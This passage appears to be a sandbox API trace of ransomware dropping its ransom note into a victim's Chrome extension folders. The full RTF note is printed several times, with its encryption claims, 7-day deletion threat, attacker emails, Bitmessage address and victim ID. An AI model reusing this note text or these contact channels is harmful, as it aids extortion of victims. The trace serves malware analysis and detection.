}}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x235fca8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.206] WriteFile (in: hFile=0x2d4, lpBuffer=0x235fca8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x235fca8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.207] CloseHandle (hObject=0x2d4) returned 1 [0289.207] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\#readme_eman#.rtf")) returned 0xffffffff [0289.207] GetLastError () returned 0x2 [0289.207] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.208] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.208] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l 